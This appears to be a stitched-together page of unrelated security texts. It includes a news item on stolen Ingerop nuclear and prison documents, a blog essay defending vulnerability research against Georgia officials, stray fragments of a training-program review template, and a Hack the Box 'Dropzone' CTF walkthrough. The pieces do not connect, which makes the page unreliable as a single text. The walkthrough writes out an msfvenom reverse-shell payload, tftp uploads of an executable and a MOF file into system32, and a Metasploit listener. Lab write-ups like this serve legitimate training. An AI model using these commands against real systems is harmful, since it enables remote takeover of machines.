Make sure you're spending your hard-earned cash on the 'right' IT security
Comment One of the unpleasant developments of the last decade has been the speed with which IT security threats, once aimed mainly at large enterprises, have spread to SMBs – small and medium businesses.…
A cyber attack on a nuclear power plant in France has revealed thousands of confidential documents, while some of the data was found on a rented server in Germany.
According to the report, the hacker accessed data illegally from the French company Ingerop in June this year. The stolen data trove amounted to more than 65 gigabytes and includes data about nuclear power plant plants, blueprints for prisons, and tram networks.
“Thousands of sensitive documents pertaining to nuclear power plants, prisons, and tram networks have been stolen from the servers of a French company in a cyber attack, German and French media have reported Friday.” reported the German website DW.com.
“The data illegally accessed from the French company Ingerop back in June amounted to more than 65 gigabytes, according to reports by German public broadcaster NDR, the daily Süddeutsche Zeitung and French newspaper Le Monde.”
The spokeswoman of the Nuclear Power Plant said that the hackers got a hold on more than 11,000 files from a dozen projects.
The sensitive documents include the locations of CCTV cameras inside a French high-security prison, detailed information about the plant, and a proposed site for a nuclear waste dump in northeastern France.
According to news stories, state elections websites are full of common vulnerabilities, those documented by the OWASP Top 10, such as "direct object references" that would allow any election registration information to be read or changed, as allowing a hacker to cancel registrations of those of the other party.
Testing for such weaknesses is not a crime. Indeed, it's desirable that people can test for security weaknesses. Systems that aren't open to test are insecure. This concept is the basis for many policy initiatives at the federal level, to not only protect researchers probing for weaknesses from prosecution, but to even provide bounties encouraging them to do so. The DoD has a "Hack the Pentagon" initiative encouraging exactly this.
But the State of Georgia is stereotypically backwards and thuggish. Earlier this year, the legislature passed SB 315 that criminalized this activity of merely attempting to access a computer without permission, to probe for possibly vulnerabilities. To the ignorant and backwards person, this seems reasonable, of course this bad activity should be outlawed. But as we in the cybersecurity community have learned over the last decades, this only outlaws your friends from finding security vulnerabilities, and does nothing to discourage your enemies. Russian election meddling hackers are not deterred by such laws, only Georgia residents concerned whether their government websites are secure.
It's your own users, and well-meaning security researchers, who are the primary source for improving security. Unless you live under a rock (like Brian Kemp, apparently), you'll have noticed that every month you have your Windows desktop or iPhone nagging you about updating the software to fix security issues. If you look behind the scenes, you'll find that most of these security fixes come from outsiders. They come from technical experts who accidentally come across vulnerabilities. They come from security researchers who specifically look for vulnerabilities.
It's because of this "research" that systems are mostly secure today. A few days ago was the 30th anniversary of the "Morris Worm" that took down the nascent Internet in 1988. The net of that time was hostile to security research, with major companies ignoring vulnerabilities. Systems then were laughably insecure, but vendors tried to address the problem by suppressing research. The Morris Worm exploited several vulnerabilities that were well-known at the time, but ignored by the vendor (in this case, primarily Sun Microsystems).
Since then, with a culture of outsiders disclosing vulnerabilities, vendors have been pressured into fix them. This has led to vast improvements in security. I'm posting this from a public WiFi hotspot in a bar, for example, because computers are secure enough for this to be safe. 10 years ago, such activity wasn't safe.
The Georgia Democrats obviously have concerns about the integrity of election systems. They have every reason to thoroughly probe an elections website looking for vulnerabilities. This sort of activity should be encouraged, not suppressed as Brian Kemp is doing.
To be fair, the issue isn't so clear. The Democrats aren't necessarily the good guys. They are probably going to lose by a slim margin, and will cry foul, pointing to every election irregularity as evidence they were cheated. It's like how in several races where Republicans lost by slim numbers they claimed criminals and dead people voted, thus calling for voter ID laws. In this case, Democrats are going to point to any potential vulnerability, real or imagined, as disenfranchising their voters. There has already been hyping of potential election systems vulnerabilities out of proportion to their realistic threat for this reason.
But while not necessarily in completely good faith, such behavior isn't criminal. If an election website has vulnerabilities, then the state should encourage the details to be made public -- and fix them.
One of the principles we've learned since the Morris Worm is that of "full disclosure". It's not simply that we want such vulnerabilities found and fixed, we also want the complete details to be made public, even embarrassing details. Among the reasons for this is that it's the only way that everyone can appreciate the consequence of vulnerabilities.
In this case, without having the details, we have only the spin from both sides to go by. One side is spinning the fact that the website was wide open. The other side, as in the above announcement, claims the website was completely secure. Obviously, one side is lying, and the only way for us to know is if the full details of the potential vulnerability are fully disclosed.
By the way, it's common for researchers to falsely believe in the severity of the vulnerability. This is at least as common as the embarrassed side trying to cover it up. It's impossible to say which side is at fault here, whether it's a real vulnerability or false, without full disclosure. Again, the wrong backwards thinking is to believe that details of vulnerabilities should be controlled, to avoid exploitation by bad guys. In fact, they should be disclosed, even if it helps the bad guys.
But regardless if these vulnerabilities are real, we do know that criminal investigation and prosecution is the wrong way to deal with the situation. If the election site is secure, then the appropriate response is to document why.
With that said, there's a good chance the Democrats are right and Brian Kemp's office is wrong. In the very announcement declaring their websites are secure, Google Chrome indicates their website is not secure in the URL sos.ga.gov, because they don't use encryption.
I'm Libertarian, so I'm going to hate a Democrat governor more than a Republican governor. However, I'm also a cybersecurity expert and somebody famous for scanning for vulnerabilities. As a Georgia resident, I'm personally threatened by this backwards thuggish behavior by Brian Kemp. He learned nothing from this year's fight over SB 315, and unlike the clueful outgoing governor who vetoed that bill, Kemp is likely to sign something similar, or worse, into law.
The integrity of election systems is an especially important concern. The only way to guarantee them is to encourage research, the probing by outsiders for vulnerabilities, and fully disclosing the results. Even if Georgia had the most secure systems, embarrassing problems are going to be found. Companies like Intel, Microsoft, and Apple are the leaders in cybersecurity, and even they have had embarrassing vulnerabilities in the last few months. They have responded by paying bounties to the security researchers who found those problems, not by criminally investigating them.
Outline the most effective bits, the approaches, activities etc. that are working well and delivering real business value.
This is the low-value, outdated stuff that no longer earns its keep, is unpopular and frankly not worth the effort any more.
The things that need revision.
Clarify the need or justification for change, elaborate on the anticipated improvements and (for the plan)
at least outline how the changes
are to be made.
innovation helps keep the awareness and training program topical, engaging and relevant. As well as updating the content, updating
the delivery mechanisms etc. can breathe new life into it.
Today we are going to solve another CTF challenge “Dropzone”. It is a retired vulnerable lab presented by Hack the Box for helping pentester’s to perform online penetration testing according to your experience level; they have a collection of vulnerable labs as challenges, from beginners to Expert level.
Task: To find user.txt and root.txt file
Note: Since these labs are online available therefore they have a static IP. The IP of Dropzone is 10.10.10.90
Let’s start off with our basic nmap command to find out the open ports and services.
nmap -sU -T4 10.10.10.90
From given below image, you can observe we found port 69 is open on the target system and running tftp service.
We connect to the target system using tftp client and find that we can upload and download file. We get the “boot.ini” file to find the operating system running system on the target machine.
We take a look at the boot.ini file and find that the target system is running “Windows XP”.
We are unable to find any exploit for tftp service. So we are going to use MOF file WMI exploitation to get reverse shell of the target machine.
msfvenom -p windows/meterpreter/reverse_tcp lhost=10.10.14.4 lport=443 -f exe > hack.exe
We upload both the shell and the MOF file using tftp.
tftp> binary tftp> put hack.exe /WINDOWS/system32/hack.exe tftp> put hack.mof /WINDOWS/system32/wbem/mof/hack.mof
We setup our listener before uploading both the files.
msf > use exploit/multi/handler msf exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp msf exploit(multi/handler) > set lhost 10.10.14.4 msf exploit(multi/handler) > set lport 443 msf exploit(multi/handler) > run
As soon as we upload the MOF file and our payload we get a reverse shell. After getting the reverse shell we check for system information and find that we have spawned a shell as administrator.
meterpreter > sysinfo meterpreter > getuid
We go to “c:\Documents and Settings\Administrator\Desktop” and find a file called “root.txt”. We take a look at the content of the file and find that the flag is not present there.
meterpreter > cd Administrator meterpreter > ls meterpreter > cd Desktop meterpreter > ls meterpreter > cat root.txt
We go to the “flags” directory and find a file called “2 for the price of 1!.txt” and find a hint that we have to use alternate data streams to find the flags. Alternate data streams are an attribute that can be found in NTFS file system. They can also be used to hide data from users.
meterpreter > cd flags meterpreter > dir meterpreter > cat "2 for the price of 1!.txt"
We can use streams.exe from sysinternals to examine Alternate Data Streams. (You can download the tool from here)
We upload the streams.exe into the target machine. We spawn the shell and execute the file to find data streams in the current directory and find both user and root flag.
meterpreter > upload /root/Downloads/Streams/streams.exe meterpreter > shell streams -accepteula -s .
Author: Sayantan Bera is a technical writer at hacking articles and cyber security enthusiast. Contact Here